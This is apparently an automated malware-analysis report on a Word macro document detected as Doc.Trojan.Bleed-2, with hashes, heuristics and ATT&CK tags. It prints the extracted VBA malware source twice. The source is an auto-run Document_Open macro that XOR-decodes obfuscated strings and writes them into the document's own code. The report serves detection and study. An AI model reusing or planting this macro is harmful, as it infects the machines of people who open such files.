Office (OLE) malware analysis — malicious · a2241dac93f85df4

MALICIOUS

Office (OLE)

41.0 KB Created: 1999-12-15 15:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f543f719610cee5f606feb0be35be34f SHA-1: 1a95bc62bbf187f5d55b257596d2b860c1e40581 SHA-256: a2241dac93f85df4c741c2939d3c856a0e3d0475ba32ab56cc7f5d699b5d67b8

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Bleed-2'. It contains a Document_Open VBA macro which is designed to execute upon opening the document. The macro contains obfuscated strings that are XORed with a key (151) to reveal a payload, which is then inserted into the document's code. This indicates the document is likely a downloader for a second-stage malicious payload.

Heuristics 3

ClamAV: Doc.Trojan.Bleed-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bleed-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6777 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6777 bytes
SHA-256: `6e357c2bcd39451d2e7a09e2e37167a2d50787bc68bcd43997857f0d56b80744`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim jacky(15) As String jacky(1) = "Øù·Òååøå·Åòäâúò·Ùòïã·Äòã·ò·ª·ÚöôåøÔøùãöþùòå·ã·ª·¦" jacky(2) = "ÄòãÖããå·ÙøåúöûÃòúçûöãò¹ÑâûûÙöúò»·áõÙøåúöû" jacky(3) = "Äòã·à·ª·ò¹ÁÕÇåøýòôã·Øçãþøùä¹ÁþåâäÇåøãòôãþøù·ª·¿Åùó·½·§¾·Øçãþøùä¹ÄöáòÙøåúöûÇåøúçã·ª·¿Åùó·½·§¾" jacky(4) = "Äòã·û·ª·à¹ÁÕÔøúçøùòùãä¿ã¾·Äòã·ð·ª·û¹ÔøóòÚøóâûò" jacky(5) = "Äòã·ä·ª·ÙøåúöûÃòúçûöãò·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò" jacky(6) = "õ·ª·ð¹ûþùòä¿ã»·¥¡¾·±·áõÔå·±·ð¹ûþùòä¿£¤»·¦¾" jacky(7) = "Þñ·ò·ª·ä·Ãÿòù" jacky(8) = "Äòã·ä·ª·ÖôãþáòÓøôâúòùã·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò" jacky(9) = "Òùó·Þñ" jacky(10) = "Þñ·ãÿ¹ûþùòä¿ã»·ã¾·ª·§·Ãÿòù" jacky(11) = "ãÿ¹ÓÒûÒãòÛÞùòÄ·ã»·ãÿ¹ôØâùãøñÛÞùÒä·ãÿ¹ÖóóÑåøúÄãåþùð·õ" jacky(12) = "Òùó·Þñ" jacky(13) = "ÃÿþäÓøôâúòùã¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò¹ÓÒûÒãòÛÞùòÄ·¥ »·¦¡" jacky(14) = "Þñ·Óöî¿Ùøà¿¾¾·ª·¿Þùã¿Åùó·½·¦¢¾¾·Ãÿòù·ÚäðÕøï·µÔþöø·Äûöðòÿöúúòå¶·Ôøúò·äãöþ¨µ»·§»·µÔûöää¹Äûöðòÿöúúòå·ë·ýöôü·ãàøñûøàòå·¸·ÛþùòÍòå§·¸·Úòãöçÿöäòµ" jacky(15) = "ÖôãþáòÓøôâúòùã¹ÄöáòÖä·ÖôãþáòÓøôâúòùã¹ÑâûûÙöúò" For y = 1 To 15: V = V & dc(jacky(y), 151) & vbCr: Next If ThisDocument.VBProject.VBComponents(1).CodeModule.lines(28, 1) = "" Then ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines 27, V differ End Sub Private Function dc(a, e) For i = 1 To Len(a): t = t & Chr(Asc(Mid(a, i, 1)) Xor e): Next i dc = t End Function Private Sub differ() End Sub ' Processing file: /opt/analyzer/scan_staging/4dd05c1f52804a129d5fa98413c1f6aa.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 9474 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' Dim ' OptionBase ' LitDI2 0x000F ' VarDefn jacky (As String) ' Line #2: ' LitStr 0x0033 "Øù·Òååøå·Åòäâúò·Ùòïã·Äòã·ò·ª·ÚöôåøÔøùãöþùòå·ã·ª·¦" ' LitDI2 0x0001 ' ArgsSt jacky 0x0001 ' Line #3: ' LitStr 0x0029 "ÄòãÖããå·ÙøåúöûÃòúçûöãò¹ÑâûûÙöúò»·áõÙøåúöû" ' LitDI2 0x0002 ' ArgsSt jacky 0x0001 ' Line #4: ' LitStr 0x005E "Äòã·à·ª·ò¹ÁÕÇåøýòôã·Øçãþøùä¹ÁþåâäÇåøãòôãþøù·ª·¿Åùó·½·§¾·Øçãþøùä¹ÄöáòÙøåúöûÇåøúçã·ª·¿Åùó·½·§¾" ' LitDI2 0x0003 ' ArgsSt jacky 0x0001 ' Line #5: ' LitStr 0x002F "Äòã·û·ª·à¹ÁÕÔøúçøùòùãä¿ã¾·Äòã·ð·ª·û¹ÔøóòÚøóâûò" ' LitDI2 0x0004 ' ArgsSt jacky 0x0001 ' Line #6: ' LitStr 0x0047 "Äòã·ä·ª·ÙøåúöûÃòúçûöãò·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò" ' LitDI2 0x0005 ' ArgsSt jacky 0x0001 ' Line #7: ' LitStr 0x002A "õ·ª·ð¹ûþùòä¿ã»·¥¡¾·±·áõÔå·±·ð¹ûþùòä¿£¤»·¦¾" ' LitDI2 0x0006 ' ArgsSt jacky 0x0001 ' Line #8: ' LitStr 0x000D "Þñ·ò·ª·ä·Ãÿòù" ' LitDI2 0x0007 ' ArgsSt jacky 0x0001 ' Line #9: ' LitStr 0x0047 "Äòã·ä·ª·ÖôãþáòÓøôâúòùã·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò" ' LitDI2 0x0008 ' ArgsSt jacky 0x0001 ' Line #10: ' LitStr 0x0006 "Òùó·Þñ" ' LitDI2 0x0009 ' ArgsSt jacky 0x0001 ' Line #11: ' LitStr 0x001A "Þñ·ãÿ¹ûþùòä¿ã»·ã¾·ª·§·Ãÿòù" ' LitDI2 0x000A ' ArgsSt jacky 0x0001 ' Line #12: ' LitStr 0x0035 "ãÿ¹ÓÒûÒãòÛÞùòÄ·ã»·ãÿ¹ôØâùãøñÛÞùÒä·ãÿ¹ÖóóÑåøúÄãåþùð·õ" ' LitDI2 0x000B ' ArgsSt jacky 0x0001 ' Line #13: ' LitStr 0x0006 "Òùó·Þñ" ' LitDI2 0x000C ' ArgsSt jacky 0x0001 ' Line #14: ' LitStr 0x0044 "ÃÿþäÓøôâúòùã¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò¹ÓÒûÒãòÛÞùòÄ·¥ »·¦¡" ' LitDI2 0x000D ' ArgsSt jacky 0x0001 ' Line #15: ' LitStr 0x008A "Þñ·Óöî¿Ùøà¿¾¾·ª·¿Þùã¿Åùó·½·¦¢¾¾·Ãÿòù·ÚäðÕøï·µÔþöø·Äûöðòÿöúúòå¶·Ôøúò·äãöþ¨µ»·§»·µÔûöää¹Äûöðòÿöúúòå·ë·ýöôü·ãàøñûøàòå·¸·ÛþùòÍòå§·¸·Úòãöçÿöäòµ" ' LitDI2 0x000E ' ArgsSt jacky 0x0001 ' Line #16: ' LitStr 0x002D "ÖôãþáòÓøôâúòùã¹ÄöáòÖä·ÖôãþáòÓøôâúòùã¹ÑâûûÙöúò" ' LitDI2 0x000F ' ArgsSt jacky 0x0001 ' Line #17: ' StartForVariable ' Ld y ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x000F ' For ' BoS 0x0000 ' Ld V ' Ld y ' ArgsLd jacky 0x0001 ' LitDI2 0x0097 ' ArgsLd dc ... (truncated)

SHA-256: 6e357c2bcd39451d2e7a09e2e37167a2d50787bc68bcd43997857f0d56b80744

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim jacky(15) As String
jacky(1) = "Øù·Òååøå·Åòäâúò·Ùòïã·Äòã·ò·ª·ÚöôåøÔøùãöþùòå·ã·ª·¦"
jacky(2) = "ÄòãÖããå·ÙøåúöûÃòúçûöãò¹ÑâûûÙöúò»·áõÙøåúöû"
jacky(3) = "Äòã·à·ª·ò¹ÁÕÇåøýòôã·Øçãþøùä¹ÁþåâäÇåøãòôãþøù·ª·¿Åùó·½·§¾·Øçãþøùä¹ÄöáòÙøåúöûÇåøúçã·ª·¿Åùó·½·§¾"
jacky(4) = "Äòã·û·ª·à¹ÁÕÔøúçøùòùãä¿ã¾·Äòã·ð·ª·û¹ÔøóòÚøóâûò"
jacky(5) = "Äòã·ä·ª·ÙøåúöûÃòúçûöãò·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
jacky(6) = "õ·ª·ð¹ûþùòä¿ã»·¥¡¾·±·áõÔå·±·ð¹ûþùòä¿£¤»·¦¾"
jacky(7) = "Þñ·ò·ª·ä·Ãÿòù"
jacky(8) = "Äòã·ä·ª·ÖôãþáòÓøôâúòùã·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
jacky(9) = "Òùó·Þñ"
jacky(10) = "Þñ·ãÿ¹ûþùòä¿ã»·ã¾·ª·§·Ãÿòù"
jacky(11) = "ãÿ¹ÓÒûÒãòÛÞùòÄ·ã»·ãÿ¹ôØâùãøñÛÞùÒä·ãÿ¹ÖóóÑåøúÄãåþùð·õ"
jacky(12) = "Òùó·Þñ"
jacky(13) = "ÃÿþäÓøôâúòùã¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò¹ÓÒûÒãòÛÞùòÄ·¥ »·¦¡"
jacky(14) = "Þñ·Óöî¿Ùøà¿¾¾·ª·¿Þùã¿Åùó·½·¦¢¾¾·Ãÿòù·ÚäðÕøï·µÔþöø·Äûöðòÿöúúòå¶·Ôøúò·äãöþ¨µ»·§»·µÔûöää¹Äûöðòÿöúúòå·ë·ýöôü·ãàøñûøàòå·¸·ÛþùòÍòå§·¸·Úòãöçÿöäòµ"
jacky(15) = "ÖôãþáòÓøôâúòùã¹ÄöáòÖä·ÖôãþáòÓøôâúòùã¹ÑâûûÙöúò"
For y = 1 To 15: V = V & dc(jacky(y), 151) & vbCr: Next
If ThisDocument.VBProject.VBComponents(1).CodeModule.lines(28, 1) = "" Then ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines 27, V
differ
End Sub
Private Function dc(a, e)
For i = 1 To Len(a): t = t & Chr(Asc(Mid(a, i, 1)) Xor e): Next i
dc = t
End Function
Private Sub differ()
End Sub


' Processing file: /opt/analyzer/scan_staging/4dd05c1f52804a129d5fa98413c1f6aa.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9474 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x000F 
' 	VarDefn jacky (As String)
' Line #2:
' 	LitStr 0x0033 "Øù·Òååøå·Åòäâúò·Ùòïã·Äòã·ò·ª·ÚöôåøÔøùãöþùòå·ã·ª·¦"
' 	LitDI2 0x0001 
' 	ArgsSt jacky 0x0001 
' Line #3:
' 	LitStr 0x0029 "ÄòãÖããå·ÙøåúöûÃòúçûöãò¹ÑâûûÙöúò»·áõÙøåúöû"
' 	LitDI2 0x0002 
' 	ArgsSt jacky 0x0001 
' Line #4:
' 	LitStr 0x005E "Äòã·à·ª·ò¹ÁÕÇåøýòôã·Øçãþøùä¹ÁþåâäÇåøãòôãþøù·ª·¿Åùó·½·§¾·Øçãþøùä¹ÄöáòÙøåúöûÇåøúçã·ª·¿Åùó·½·§¾"
' 	LitDI2 0x0003 
' 	ArgsSt jacky 0x0001 
' Line #5:
' 	LitStr 0x002F "Äòã·û·ª·à¹ÁÕÔøúçøùòùãä¿ã¾·Äòã·ð·ª·û¹ÔøóòÚøóâûò"
' 	LitDI2 0x0004 
' 	ArgsSt jacky 0x0001 
' Line #6:
' 	LitStr 0x0047 "Äòã·ä·ª·ÙøåúöûÃòúçûöãò·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
' 	LitDI2 0x0005 
' 	ArgsSt jacky 0x0001 
' Line #7:
' 	LitStr 0x002A "õ·ª·ð¹ûþùòä¿ã»·¥¡¾·±·áõÔå·±·ð¹ûþùòä¿£¤»·¦¾"
' 	LitDI2 0x0006 
' 	ArgsSt jacky 0x0001 
' Line #8:
' 	LitStr 0x000D "Þñ·ò·ª·ä·Ãÿòù"
' 	LitDI2 0x0007 
' 	ArgsSt jacky 0x0001 
' Line #9:
' 	LitStr 0x0047 "Äòã·ä·ª·ÖôãþáòÓøôâúòùã·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
' 	LitDI2 0x0008 
' 	ArgsSt jacky 0x0001 
' Line #10:
' 	LitStr 0x0006 "Òùó·Þñ"
' 	LitDI2 0x0009 
' 	ArgsSt jacky 0x0001 
' Line #11:
' 	LitStr 0x001A "Þñ·ãÿ¹ûþùòä¿ã»·ã¾·ª·§·Ãÿòù"
' 	LitDI2 0x000A 
' 	ArgsSt jacky 0x0001 
' Line #12:
' 	LitStr 0x0035 "ãÿ¹ÓÒûÒãòÛÞùòÄ·ã»·ãÿ¹ôØâùãøñÛÞùÒä·ãÿ¹ÖóóÑåøúÄãåþùð·õ"
' 	LitDI2 0x000B 
' 	ArgsSt jacky 0x0001 
' Line #13:
' 	LitStr 0x0006 "Òùó·Þñ"
' 	LitDI2 0x000C 
' 	ArgsSt jacky 0x0001 
' Line #14:
' 	LitStr 0x0044 "ÃÿþäÓøôâúòùã¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò¹ÓÒûÒãòÛÞùòÄ·¥ »·¦¡"
' 	LitDI2 0x000D 
' 	ArgsSt jacky 0x0001 
' Line #15:
' 	LitStr 0x008A "Þñ·Óöî¿Ùøà¿¾¾·ª·¿Þùã¿Åùó·½·¦¢¾¾·Ãÿòù·ÚäðÕøï·µÔþöø·Äûöðòÿöúúòå¶·Ôøúò·äãöþ¨µ»·§»·µÔûöää¹Äûöðòÿöúúòå·ë·ýöôü·ãàøñûøàòå·¸·ÛþùòÍòå§·¸·Úòãöçÿöäòµ"
' 	LitDI2 0x000E 
' 	ArgsSt jacky 0x0001 
' Line #16:
' 	LitStr 0x002D "ÖôãþáòÓøôâúòùã¹ÄöáòÖä·ÖôãþáòÓøôâúòùã¹ÑâûûÙöúò"
' 	LitDI2 0x000F 
' 	ArgsSt jacky 0x0001 
' Line #17:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x000F 
' 	For 
' 	BoS 0x0000 
' 	Ld V 
' 	Ld y 
' 	ArgsLd jacky 0x0001 
' 	LitDI2 0x0097 
' 	ArgsLd dc 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.